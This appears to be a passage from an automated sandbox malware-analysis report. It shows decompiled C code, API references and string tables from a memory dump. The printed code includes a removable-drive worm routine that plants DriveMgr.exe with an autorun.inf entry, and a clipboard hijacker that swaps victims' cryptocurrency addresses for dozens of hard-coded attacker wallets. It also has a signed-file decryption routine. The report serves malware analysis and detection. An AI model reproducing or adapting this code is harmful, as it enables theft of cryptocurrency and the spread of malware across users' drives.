									if(PathMatchSpecW( &(_v4252.cFileName),  *(_t241 + _v5380 * 4 - 0x14f4)) != 0) {
										wsprintfW( &_v2604, L"%s\\%s", _a4,  &(_v4252.cFileName));
										_t248 = _t248 + 0x10;
										SetFileAttributesW( &_v2604, 0x80);
										DeleteFileW( &_v2604);
										_v5369 = 1;
										break;
									}
									_v5380 = _v5380 + 1;
								}
								if((_v5369 & 0x000000ff) == 0) {
									if(PathFileExistsW( &_v4772) != 0) {
										wsprintfW( &_v3652, L"%s\\%s", _a4,  &(_v4252.cFileName));
										wsprintfW( &_v1044, L"%s\\%s\\%s", _a4, _v2608,  &(_v4252.cFileName));
										_t248 = _t248 + 0x24;
										if((_v4252.dwFileAttributes & 0x00000010) == 0) {
											MoveFileExW( &_v3652,  &_v1044, 9);
										} else {
											E008B1F80( &_v3652,  &_v1044);
											_t248 = _t248 + 8;
										}
									}
								}
								goto L45;
							}
						}
						L45:
					} while (FindNextFileW(_v4776,  &_v4252) != 0);
					FindClose(_v4776);
					goto L47;
				}
			}

0x008b20c8
0x008b20d5
0x00000000
0x008b20d7
0x008b20de
0x008b20e8
0x008b20ff
0x008b211f
0x008b213f
0x008b215f
0x008b2178
0x008b2191
0x008b2197
0x008b21a9
0x008b21b2
0x008b21b7
0x008b21ba
0x008b21c0
0x008b21cb
0x008b21d9
0x008b21e6
0x008b21e6
0x008b21cb
0x008b21fb
0x008b220c
0x008b222a
0x008b222a
0x008b223f
0x008b224f
0x008b225e
0x008b225e
0x008b223f
0x008b2273
0x008b227b
0x008b22b1
0x008b22b6
0x008b227d
0x008b2292
0x008b2297
0x008b2297
0x008b22c2
0x008b22c2
0x008b22d7
0x008b22d9
0x008b22de
0x008b22e4
0x008b22e5
0x008b22ea
0x008b22ed
0x008b22fa
0x008b2308
0x008b2317
0x008b231c
0x008b2328
0x008b2328
0x008b22fa
0x008b2342
0x008b234f
0x008b25ef
0x00000000
0x008b2355
0x008b2355
0x008b235f
0x008b2369
0x008b2373
0x008b237d
0x008b2387
0x008b2391
0x008b239b
0x008b23a5
0x008b23af
0x008b23b9
0x008b23c3
0x008b23d3
0x008b23df
0x008b23e5
0x008b23ef
0x008b2403
0x008b2420
0x008b2427
0x008b2442
0x008b2468
0x008b246c
0x00000000
0x008b246c
0x008b243c
0x008b243c
0x008b2480
0x008b2487
0x008b248e
0x008b24a9
0x008b24cf
0x008b24ea
0x008b24f0
0x008b24ff
0x008b250c
0x008b2512
0x00000000
0x008b2512
0x008b24a3
0x008b24a3
0x008b2529
0x008b253f
0x008b255d
0x008b2584
0x008b258a
0x008b2596
0x008b25c0
0x008b2598
0x008b25a6
0x008b25ab
0x008b25ab
0x008b2596
0x008b253f
0x00000000
0x008b2529
0x008b2482
0x008b25c6
0x008b25da
0x008b25e9
0x00000000
0x008b25e9

APIs

wsprintfW.USER32 ref: 008B20FF
wsprintfW.USER32 ref: 008B211F
wsprintfW.USER32 ref: 008B213F
wsprintfW.USER32 ref: 008B215F
wsprintfW.USER32 ref: 008B2178
wsprintfW.USER32 ref: 008B2191
PathFileExistsW.SHLWAPI(?), ref: 008B21A1
SetFileAttributesW.KERNEL32(?,00000080), ref: 008B21D9
DeleteFileW.KERNEL32(?), ref: 008B21E6
PathFileExistsW.SHLWAPI(?), ref: 008B21F3
PathFileExistsW.SHLWAPI(?), ref: 008B2204
CreateDirectoryW.KERNEL32(?,00000000), ref: 008B2217
SetFileAttributesW.KERNEL32(?,00000007), ref: 008B222A
PathFileExistsW.SHLWAPI(?), ref: 008B2237
CopyFileW.KERNEL32(008BA8B0,?,00000000), ref: 008B224F

Strings

autorun.inf, xrefs: 008B23E5
[AuToRuN]ShEllExECutE=__\DriveMgr.exeUsEAuToPLaY=1, xrefs: 008B22FC
%s\%s, xrefs: 008B2153
*.lnk, xrefs: 008B2355, 008B24BF
*.com, xrefs: 008B2387
shell32.dll, xrefs: 008B229E
*.pif, xrefs: 008B23A5
*.vbe, xrefs: 008B23C3
%s\%s, xrefs: 008B24DE
*.cmd, xrefs: 008B239B
%s\%s, xrefs: 008B2133
*.jse, xrefs: 008B2391
%s\%s\%s, xrefs: 008B2578
%s.lnk, xrefs: 008B20F3
%s\%s, xrefs: 008B2551
%s\autorun.inf, xrefs: 008B2185
*.js, xrefs: 008B2373
%s\*, xrefs: 008B216C
*.jar, xrefs: 008B23AF
*.bat, xrefs: 008B2369
*.dll, xrefs: 008B23B9
shell32.dll, xrefs: 008B227F
%s\%s\DriveMgr.exe, xrefs: 008B2113
*.vbs, xrefs: 008B235F
*.scr, xrefs: 008B237D

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveMgr.exe$%s\*$%s\autorun.inf$*.bat$*.cmd$*.com$*.dll$*.jar$*.js$*.jse$*.lnk$*.pif$*.scr$*.vbe$*.vbs$[AuToRuN]ShEllExECutE=__\DriveMgr.exeUsEAuToPLaY=1$autorun.inf$shell32.dll$shell32.dll
API String ID: 3542775751-1771511795
Opcode ID: b391b0adc5eaf50fe696e68b76da12a02eaa3ce042335d4474abc7d4bbdac05e
Instruction ID: f0cd0d717b9f3d1d9190ecc0d986e890ae73b800f21acd3b7ea5ddd4a5b33c9e
Opcode Fuzzy Hash: b391b0adc5eaf50fe696e68b76da12a02eaa3ce042335d4474abc7d4bbdac05e
Instruction Fuzzy Hash: 27D16C759002199BCB20DF64CC88AEA7778FF48705F4486D8F109E6351E779EAA8CF61

Uniqueness

Uniqueness Score: -1.00%

Function 008B1000, Relevance: 95.0, APIs: 12, Strings: 42, Instructions: 471
clipboardstringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E008B1000(char* _a4) {
				int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				void* _v24;
				struct HWND__* _v28;
				int _t143;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t150;
				void* _t164;
				void* _t165;
				void* _t167;
				void* _t186;
				void* _t188;
				void* _t189;
				char _t191;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t335;
				void* _t336;

				_v20 = 0;
				_t143 = strlen(_a4);
				_t326 = _t325 + 4;
				_v8 = _t143;
				if( *_a4 != 0x31 &&  *_a4 != 0x33 &&  *_a4 != 0x58 &&  *_a4 != 0x44 &&  *_a4 != 0x30 &&  *_a4 != 0x4c &&  *_a4 != 0x72 &&  *_a4 != 0x54 &&  *_a4 != 0x74 &&  *_a4 != 0x68 &&  *_a4 != 0x51 &&  *_a4 != 0x52 &&  *_a4 != 0x4e &&  *_a4 != 0x41 &&  *_a4 != 0x53 &&  *_a4 != 0x7a &&  *_a4 != 0x73 &&  *_a4 != 0x71 &&  *_a4 != 0x63 &&  *_a4 != 0x34 &&  *_a4 != 0x61 &&  *_a4 != 0x46 &&  *_a4 != 0x47 &&  *_a4 != 0x62 &&  *_a4 != 0x55 &&  *_a4 != 0x45 &&  *_a4 != 0x42) {
					return 0;
				}
				if( *_a4 != 0x34) {
					_t145 = E008B1620(_a4, "bitcoincash:");
					_t327 = _t326 + 8;
					if(_t145 == 0) {
						_t146 = E008B1620(_a4, "cosmos");
						_t328 = _t327 + 8;
						if(_t146 == 0) {
							_t147 = E008B1620(_a4, "addr");
							_t328 = _t328 + 8;
							if(_t147 == 0) {
								if( *_a4 == 0x55 ||  *_a4 == 0x45 ||  *_a4 == 0x42) {
									if(_v8 == 9) {
										goto L57;
									}
									return 0;
								} else {
									if(_v8 < 0x15 || _v8 > 0x38) {
										return 0;
									} else {
										goto L57;
									}
								}
							}
							if(_v8 < 0x62 || _v8 > 0x69) {
								return 0;
							} else {
								goto L57;
							}
						}
						if(_v8 < 0x2a || _v8 > 0x30) {
							return 0;
						} else {
							goto L57;
						}
					}
					if(_v8 < 0x32 || _v8 > 0x38) {
						return 0;
					} else {
						goto L57;
					}
				} else {
					if(_v8 < 0x5a || _v8 > 0x73) {
						return 0;
					} else {
						L57:
						_t150 = E008B1620(_a4, "bitcoincash:");
						_t329 = _t328 + 8;
						if(_t150 != 0) {
							L70:
							if( *_a4 == 0x31) {
								if(_v8 != 0x15) {
									if(_v8 != 0x30) {
										_v12 = "1FGzLF98d6Uv7P4YH7J4FF4bU599qtZNSk";
									} else {
										_v12 = "12sNWkfRAweJAAc3kw2cRAxcivya6jB6euAp7VVYQgq9Cbj1";
									}
								} else {
									_v12 = "10828018954959502448L";
								}
							}
							if( *_a4 == 0x33) {
								_v12 = "3JHbgxWSZzvG73eeMZuTvV8LaCwPaSwH5e";
							}
							if( *_a4 == 0x71) {
								_v12 = "qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj";
							}
							if( *_a4 == 0x58) {
								_v12 = "XhWmmLwQr1TEACBVaz9uXxwd83bz4a5Kp9";
							}
							if( *_a4 == 0x44) {
								_v12 = "DQzK3cvLHL51kPqXrFxKNzxNYrXtgTUsan";
							}
							if( *_a4 == 0x30) {
								_v12 = "0x2F1A943E9a5c200BC685C0f0E30e8D617b75c9E6";
							}
							if( *_a4 == 0x4c) {
								_v12 = "LSmkLAiDT3acWcRB7VkYoi41DUoEixusix";
							}
							if( *_a4 == 0x72) {
								_v12 = "rBph5FwQDLfmTdUY3McSCHHvPh5ffoW2LG";
							}
							if( *_a4 == 0x54) {
								_v12 = "TPVRSFAS59sQwH9jDiqQLaeXhFRVEFurPQ";
							}
							if( *_a4 == 0x74) {
								_v12 = "t1URDzZXrWRRL8C1tRqtibK9VBRNwpvpNU3";
							}
							if( *_a4 == 0x68) {
								_v12 = "hx2cf5c806d6018b836192c9438d4968e5b276de09";
							}
							if( *_a4 == 0x51) {
								_v12 = "QSKnYEtmjoB8woXupuXi886TKhCmqqYukM";
							}
							if( *_a4 == 0x52) {
								_v12 = "RBA2BBrCMzhhRYc5hwZe94fMneerdbc12M";
							}
							if( *_a4 == 0x4e) {
								_v12 = "NC3PIUBMK5UDEC77T6HCMAYIEU2MD34FLVGFECFP";
							}
							if( *_a4 == 0x41) {
								_v12 = "AXmdnTwZTtJihRwpd8HRQDEr6dEwXohGy9";
							}
							if( *_a4 == 0x53) {
								_v12 = "SdNRyZDBTeg9iaSnDgDKJTBZuXCojAwkzh";
							}
							if( *_a4 == 0x7a) {
								_v12 = "zil1kfzvsmq5lsej4j88krv6gwshpj3ngre5fr9rau";
							}
							if( *_a4 == 0x73) {
								_v12 = "s1cVz9fwAtYoThbcqWTvEfTznfeUb3tDS1r";
							}
							_t164 = E008B1620(_a4, "bitcoincash");
							_t330 = _t329 + 8;
							if(_t164 != 0) {
								_v12 = "bitcoincash:qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj";
							}
							_t165 = E008B1620(_a4, "cosmos");
							_t331 = _t330 + 8;
							if(_t165 != 0) {
								_v12 = "cosmos1fw3x9atn2vwzuvmsm57xwd6q0kev2kqdun9aft";
							}
							if( *_a4 == 0x34) {
								_v12 = "4Aap1n942WybmwMtxXGVnUZsXhkhzBUU9QnkzN3m7Lyo8ohPFCxKAeLawZ5hCm9k16hEbbygxcsCrKRVnWhEfMESCN2tEoj";
							}
							_t167 = E008B1620(_a4, "addr");
							_t332 = _t331 + 8;
							if(_t167 != 0) {
								_v12 = "addr1qxmw6egqfgv7j46rmcttyp4tshehfy6zpdg7fsr4l483ky54unzcs22er28vc2fzflsxxxlum5dl28mncz7aq8t9khys37pt2n";
							}
							if( *_a4 == 0x46) {
								_v12 = "FjShn9sWBbATYz5fADHXhkrv8ER7UjdKpX";
							}
							if( *_a4 == 0x47) {
								_v12 = "GBQOR5U76QPW4VRAETF37FHRTZNLMQS5I3SOCZMFK2ICJROOMKPWMKF4";
							}
							if( *_a4 != 0x62) {
								L129:
								if( *_a4 == 0x55) {
									_v12 = "U28040101";
								}
								if( *_a4 == 0x45) {
									_v12 = "E24912861";
								}
								if( *_a4 == 0x42) {
									_v12 = "B28124780";
								}
								_v16 = strlen(_v12);
								_v24 = GlobalAlloc(0x2002, _v16 + 1);
								_v20 = GlobalLock(_v24);
								memcpy(_v20, _v12, _v16 + 1);
								GlobalUnlock(_v24);
								if(OpenClipboard(0) != 0) {
									EmptyClipboard();
									SetClipboardData(1, _v24);
									CloseClipboard();
								}
								return 1;
							} else {
								_t186 = E008B1620(_a4, "bnb");
								_t335 = _t332 + 8;
								if(_t186 != 0) {
									_v12 = "bnb1dvgnqudkvrkx5674p9ayqxhaqqh3ewwppyqzp";
								}
								_t188 = E008B1620(_a4, "band");
								_t336 = _t335 + 8;
								if(_t188 != 0) {
									_v12 = "band1cxp0d4yrdylm93nl3l5xdjmludftd49nf6lx75";
								}
								_t189 = E008B1620(_a4, "bc");
								_t332 = _t336 + 8;
								if(_t189 != 0) {
									_v12 = "bc1qlumv78ht05dzdjaffdltlnruwdhuj535cx9j4n";
								}
								goto L129;
							}
						}
						_v28 = 0;
						while(_v28 < _v8) {
							if( *_a4 != 0x31 || _a4[_v28] != 0x4f && _a4[_v28] != 0x49 && _a4[_v28] != 0x6c) {
								_t191 = _a4[_v28];
								_push(_t191);
								L008B5582();
								_t329 = _t329 + 4;
								if(_t191 != 0) {
									L69:
									_v28 =  &(_v28->i);
									continue;
								}
								_push(_a4[_v28]);
								L008B557C();
								_t329 = _t329 + 4;
								if(_t191 != 0) {
									goto L69;
								}
								return 0;
							} else {
								return 0;
							}
						}
						goto L70;
					}
				}
			}

0x008b1006
0x008b1011
0x008b1016
0x008b1019
0x008b1025
0x00000000
0x008b1185
0x008b1195
0x008b11b8
0x008b11bd
0x008b11c2
0x008b11e5
0x008b11ea
0x008b11ef
0x008b120f
0x008b1214
0x008b1219
0x008b1239
0x008b1255
0x00000000
0x008b125e
0x00000000
0x008b1260
0x008b1264
0x00000000
0x00000000
0x00000000
0x00000000
0x008b1264
0x008b1239
0x008b121f
0x00000000
0x008b122e
0x00000000
0x008b122e
0x008b121f
0x008b11f5
0x00000000
0x008b1204
0x00000000
0x008b1204
0x008b11f5
0x008b11c8
0x00000000
0x008b11d7
0x00000000
0x008b11d7
0x008b1197
0x008b119b
0x00000000
0x008b11aa
0x008b1273
0x008b127c
0x008b1281
0x008b1286
0x008b131a
0x008b1323
0x008b1329
0x008b1338
0x008b1343
0x008b133a
0x008b133a
0x008b133a
0x008b132b
0x008b132b
0x008b132b
0x008b1329
0x008b1353
0x008b1355
0x008b1355
0x008b1365
0x008b1367
0x008b1367
0x008b1377
0x008b1379
0x008b1379
0x008b1389
0x008b138b
0x008b138b
0x008b139b
0x008b139d
0x008b139d
0x008b13ad
0x008b13af
0x008b13af
0x008b13bf
0x008b13c1
0x008b13c1
0x008b13d1
0x008b13d3
0x008b13d3
0x008b13e3
0x008b13e5
0x008b13e5
0x008b13f5
0x008b13f7
0x008b13f7
0x008b1407
0x008b1409
0x008b1409
0x008b1419
0x008b141b
0x008b141b
0x008b142b
0x008b142d
0x008b142d
0x008b143d
0x008b143f
0x008b143f
0x008b144f
0x008b1451
0x008b1451
0x008b1461
0x008b1463
0x008b1463
0x008b1473
0x008b1475
0x008b1475
0x008b1485
0x008b148a
0x008b148f
0x008b1491
0x008b1491
0x008b14a1
0x008b14a6
0x008b14ab
0x008b14ad
0x008b14ad
0x008b14bd
0x008b14bf
0x008b14bf
0x008b14cf
0x008b14d4
0x008b14d9
0x008b14db
0x008b14db
0x008b14eb
0x008b14ed
0x008b14ed
0x008b14fd
0x008b14ff
0x008b14ff
0x008b150f
0x008b1565
0x008b156e
0x008b1570
0x008b1570
0x008b1580
0x008b1582
0x008b1582
0x008b1592
0x008b1594
0x008b1594
0x008b15a7
0x008b15bc
0x008b15c9
0x008b15db
0x008b15e7
0x008b15f7
0x008b15f9
0x008b1605
0x008b160b
0x008b160b
0x00000000
0x008b1511
0x008b151a
0x008b151f
0x008b1524
0x008b1526
0x008b1526
0x008b1536
0x008b153b
0x008b1540
0x008b1542
0x008b1542
0x008b1552
0x008b1557
0x008b155c
0x008b155e
0x008b155e
0x00000000
0x008b155c
0x008b150f
0x008b128c
0x008b129e
0x008b12af
0x008b12e8
0x008b12eb
0x008b12ec
0x008b12f1
0x008b12f6
0x008b1315
0x008b129b
0x00000000
0x008b129b
0x008b1301
0x008b1302
0x008b1307
0x008b130c
0x00000000
0x00000000
0x00000000
0x008b12db
0x00000000
0x008b12db
0x008b12af
0x00000000
0x008b129e
0x008b119b

APIs

strlen.MSVCRT ref: 008B1011
isalpha.MSVCRT ref: 008B12EC
isdigit.MSVCRT ref: 008B1302
strlen.MSVCRT ref: 008B159F
GlobalAlloc.KERNEL32(00002002,?), ref: 008B15B6
GlobalLock.KERNEL32 ref: 008B15C3
memcpy.MSVCRT ref: 008B15DB
GlobalUnlock.KERNEL32(?), ref: 008B15E7
OpenClipboard.USER32(00000000), ref: 008B15EF
EmptyClipboard.USER32 ref: 008B15F9
SetClipboardData.USER32 ref: 008B1605
CloseClipboard.USER32 ref: 008B160B

Strings

SdNRyZDBTeg9iaSnDgDKJTBZuXCojAwkzh, xrefs: 008B1451
GBQOR5U76QPW4VRAETF37FHRTZNLMQS5I3SOCZMFK2ICJROOMKPWMKF4, xrefs: 008B14FF, 008B1519
addr, xrefs: 008B1206
QSKnYEtmjoB8woXupuXi886TKhCmqqYukM, xrefs: 008B1409
XhWmmLwQr1TEACBVaz9uXxwd83bz4a5Kp9, xrefs: 008B1379
addr, xrefs: 008B14C6
band1cxp0d4yrdylm93nl3l5xdjmludftd49nf6lx75, xrefs: 008B1542, 008B1551
FjShn9sWBbATYz5fADHXhkrv8ER7UjdKpX, xrefs: 008B14ED
3JHbgxWSZzvG73eeMZuTvV8LaCwPaSwH5e, xrefs: 008B1355
qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj, xrefs: 008B1367
rBph5FwQDLfmTdUY3McSCHHvPh5ffoW2LG, xrefs: 008B13C1
RBA2BBrCMzhhRYc5hwZe94fMneerdbc12M, xrefs: 008B141B
zil1kfzvsmq5lsej4j88krv6gwshpj3ngre5fr9rau, xrefs: 008B1463
LSmkLAiDT3acWcRB7VkYoi41DUoEixusix, xrefs: 008B13AF
1FGzLF98d6Uv7P4YH7J4FF4bU599qtZNSk, xrefs: 008B1343
0x2F1A943E9a5c200BC685C0f0E30e8D617b75c9E6, xrefs: 008B139D
bitcoincash:qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj, xrefs: 008B1491, 008B14A0
cosmos1fw3x9atn2vwzuvmsm57xwd6q0kev2kqdun9aft, xrefs: 008B14AD
B28124780, xrefs: 008B1594, 008B159E, 008B15D6
TPVRSFAS59sQwH9jDiqQLaeXhFRVEFurPQ, xrefs: 008B13D3
NC3PIUBMK5UDEC77T6HCMAYIEU2MD34FLVGFECFP, xrefs: 008B142D
band, xrefs: 008B152D
cosmos, xrefs: 008B11DC
bitcoincash, xrefs: 008B147C
4Aap1n942WybmwMtxXGVnUZsXhkhzBUU9QnkzN3m7Lyo8ohPFCxKAeLawZ5hCm9k16hEbbygxcsCrKRVnWhEfMESCN2tEoj, xrefs: 008B14BF, 008B14CE
bc1qlumv78ht05dzdjaffdltlnruwdhuj535cx9j4n, xrefs: 008B155E
AXmdnTwZTtJihRwpd8HRQDEr6dEwXohGy9, xrefs: 008B143F
t1URDzZXrWRRL8C1tRqtibK9VBRNwpvpNU3, xrefs: 008B13E5
hx2cf5c806d6018b836192c9438d4968e5b276de09, xrefs: 008B13F7
E24912861, xrefs: 008B1582
12sNWkfRAweJAAc3kw2cRAxcivya6jB6euAp7VVYQgq9Cbj1, xrefs: 008B133A
U28040101, xrefs: 008B1570
bnb, xrefs: 008B1511
bnb1dvgnqudkvrkx5674p9ayqxhaqqh3ewwppyqzp, xrefs: 008B1526, 008B1535
10828018954959502448L, xrefs: 008B132B
cosmos, xrefs: 008B1498
0, xrefs: 008B1334
DQzK3cvLHL51kPqXrFxKNzxNYrXtgTUsan, xrefs: 008B138B
bitcoincash:, xrefs: 008B11AF
bitcoincash:, xrefs: 008B1273
s1cVz9fwAtYoThbcqWTvEfTznfeUb3tDS1r, xrefs: 008B1475, 008B1484
addr1qxmw6egqfgv7j46rmcttyp4tshehfy6zpdg7fsr4l483ky54unzcs22er28vc2fzflsxxxlum5dl28mncz7aq8t9khys37pt2n, xrefs: 008B14DB

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: Clipboard$Global$strlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
String ID: 0$0x2F1A943E9a5c200BC685C0f0E30e8D617b75c9E6$10828018954959502448L$12sNWkfRAweJAAc3kw2cRAxcivya6jB6euAp7VVYQgq9Cbj1$1FGzLF98d6Uv7P4YH7J4FF4bU599qtZNSk$3JHbgxWSZzvG73eeMZuTvV8LaCwPaSwH5e$4Aap1n942WybmwMtxXGVnUZsXhkhzBUU9QnkzN3m7Lyo8ohPFCxKAeLawZ5hCm9k16hEbbygxcsCrKRVnWhEfMESCN2tEoj$AXmdnTwZTtJihRwpd8HRQDEr6dEwXohGy9$B28124780$DQzK3cvLHL51kPqXrFxKNzxNYrXtgTUsan$E24912861$FjShn9sWBbATYz5fADHXhkrv8ER7UjdKpX$GBQOR5U76QPW4VRAETF37FHRTZNLMQS5I3SOCZMFK2ICJROOMKPWMKF4$LSmkLAiDT3acWcRB7VkYoi41DUoEixusix$NC3PIUBMK5UDEC77T6HCMAYIEU2MD34FLVGFECFP$QSKnYEtmjoB8woXupuXi886TKhCmqqYukM$RBA2BBrCMzhhRYc5hwZe94fMneerdbc12M$SdNRyZDBTeg9iaSnDgDKJTBZuXCojAwkzh$TPVRSFAS59sQwH9jDiqQLaeXhFRVEFurPQ$U28040101$XhWmmLwQr1TEACBVaz9uXxwd83bz4a5Kp9$addr$addr$addr1qxmw6egqfgv7j46rmcttyp4tshehfy6zpdg7fsr4l483ky54unzcs22er28vc2fzflsxxxlum5dl28mncz7aq8t9khys37pt2n$band$band1cxp0d4yrdylm93nl3l5xdjmludftd49nf6lx75$bc1qlumv78ht05dzdjaffdltlnruwdhuj535cx9j4n$bitcoincash$bitcoincash:$bitcoincash:$bitcoincash:qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj$bnb$bnb1dvgnqudkvrkx5674p9ayqxhaqqh3ewwppyqzp$cosmos$cosmos$cosmos1fw3x9atn2vwzuvmsm57xwd6q0kev2kqdun9aft$hx2cf5c806d6018b836192c9438d4968e5b276de09$qpx7g2fyuwq48npc3mscuzr04z6knnkj0swcy4e0xj$rBph5FwQDLfmTdUY3McSCHHvPh5ffoW2LG$s1cVz9fwAtYoThbcqWTvEfTznfeUb3tDS1r$t1URDzZXrWRRL8C1tRqtibK9VBRNwpvpNU3$zil1kfzvsmq5lsej4j88krv6gwshpj3ngre5fr9rau
API String ID: 2251388001-2807189545
Opcode ID: 2a05c74d609741b3f38573964135b67b786ab5fde24bd98d288314b3fcc8b51b
Instruction ID: 5d0a2316e6874ee6caeaee475ab37c86fd77166730e14cd6a51af8be7b1f1514
Opcode Fuzzy Hash: 2a05c74d609741b3f38573964135b67b786ab5fde24bd98d288314b3fcc8b51b
Instruction Fuzzy Hash: 63122771A04288AACF24CF94C4E85FE7FB2FF43356BA48099D955DF311D6389A94CB84

Uniqueness

Uniqueness Score: -1.00%

Function 008B17D0, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 178
filememoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E008B17D0(WCHAR* _a4) {
				long* _v8;
				signed int _v9;
				void* _v16;
				long _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				void* _v40;
				intOrPtr _v44;
				intOrPtr _t82;
				long _t92;
				intOrPtr _t96;
				long* _t99;
				long* _t120;

				_v9 = 0;
				_v8 = 0;
				_t99 =  *0x8ba8a0; // 0xc9ea08
				if(CryptImportKey(_t99, 0x8b67c0, 0x214, 0, 0,  &_v8) == 0) {
					L20:
					return _v9;
				}
				_v16 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
				if(_v16 == 0xffffffff) {
					L19:
					CryptDestroyKey(_v8);
					goto L20;
				}
				_v20 = GetFileSize(_v16, 0);
				if(_v20 == 0) {
					L18:
					CloseHandle(_v16);
					goto L19;
				}
				_v24 = CreateFileMappingA(_v16, 0, 4, 0, 0, 0);
				if(_v24 == 0) {
					L16:
					if((_v9 & 0x000000ff) != 0) {
						SetFilePointer(_v16, _v20, 0, 0);
						SetEndOfFile(_v16);
					}
					goto L18;
				}
				_v28 = MapViewOfFile(_v24, 6, 0, 0, 0);
				if(_v28 == 0) {
					L15:
					CloseHandle(_v24);
					goto L16;
				}
				if( *_v28 != 0x2153474e ||  *((intOrPtr*)(_v28 + 4)) <= 0) {
					L14:
					UnmapViewOfFile(_v28);
					goto L15;
				} else {
					_t82 =  *((intOrPtr*)(_v28 + 4));
					if(_t82 >= _v20) {
						goto L14;
					}
					_t120 =  *0x8ba8a0; // 0xc9ea08
					__imp__CryptCreateHash(_t120, 0x8004, 0, 0,  &_v32);
					if(_t82 == 0) {
						goto L14;
					}
					_v36 = _v28 + 8;
					_v44 = _v36 +  *((intOrPtr*)(_v28 + 4));
					_v20 = _v20 - _v44 - _v28;
					_v40 = HeapAlloc(GetProcessHeap(), 0, _v20);
					if(_v40 == 0) {
						goto L14;
					}
					E008B16F0(_v44, _v20, _v40, _v36,  *((intOrPtr*)(_v28 + 4)));
					_t92 = _v20;
					__imp__CryptHashData(_v32, _v40, _t92, 0);
					if(_t92 != 0) {
						_t96 = _v36;
						__imp__CryptVerifySignatureA(_v32, _t96,  *((intOrPtr*)(_v28 + 4)), _v8, 0, 0);
						if(_t96 != 0) {
							_v9 = 1;
							memcpy(_v28, _v40, _v20);
						}
					}
					HeapFree(GetProcessHeap(), 0, _v40);
					goto L14;
				}
			}

0x008b17d6
0x008b17da
0x008b17f3
0x008b1802
0x008b19e6
0x008b19ec
0x008b19ec
0x008b1821
0x008b1828
0x008b19dc
0x008b19e0
0x00000000
0x008b19e0
0x008b183a
0x008b1841
0x008b19d2
0x008b19d6
0x00000000
0x008b19d6
0x008b185b
0x008b1862
0x008b19ae
0x008b19b4
0x008b19c2
0x008b19cc
0x008b19cc
0x00000000
0x008b19b4
0x008b187a
0x008b1881
0x008b19a4
0x008b19a8
0x00000000
0x008b19a8
0x008b1890
0x008b199a
0x008b199e
0x00000000
0x008b18a3
0x008b18a6
0x008b18ac
0x00000000
0x00000000
0x008b18bf
0x008b18c6
0x008b18ce
0x00000000
0x00000000
0x008b18da
0x008b18e6
0x008b18f4
0x008b190a
0x008b1911
0x00000000
0x00000000
0x008b192e
0x008b1938
0x008b1944
0x008b194c
0x008b195d
0x008b1965
0x008b196d
0x008b196f
0x008b197f
0x008b1984
0x008b196d
0x008b1994
0x00000000
0x008b1994

APIs

CryptImportKey.ADVAPI32(00C9EA08,008B67C0,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008B1CE7), ref: 008B17FA
CreateFileW.KERNEL32(008B1CE7,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,008B1CE7), ref: 008B181B
GetFileSize.KERNEL32(000000FF,00000000), ref: 008B1834
CreateFileMappingA.KERNEL32 ref: 008B1855
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 008B1874
CryptCreateHash.ADVAPI32(00C9EA08,00008004,00000000,00000000,?), ref: 008B18C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B18FD
HeapAlloc.KERNEL32(00000000), ref: 008B1904

Part of subcall function 008B16F0: memcpy.MSVCRT ref: 008B174F
Part of subcall function 008B16F0: memcpy.MSVCRT ref: 008B1763
Part of subcall function 008B16F0: CryptImportKey.ADVAPI32(00C9EA08,00000008,0000001C,00000000,00000000,00000000), ref: 008B1787
Part of subcall function 008B16F0: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 008B17AD
Part of subcall function 008B16F0: CryptDestroyKey.ADVAPI32(00000000), ref: 008B17C0

CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 008B1944
CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 008B1965
memcpy.MSVCRT ref: 008B197F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B198D
HeapFree.KERNEL32(00000000), ref: 008B1994
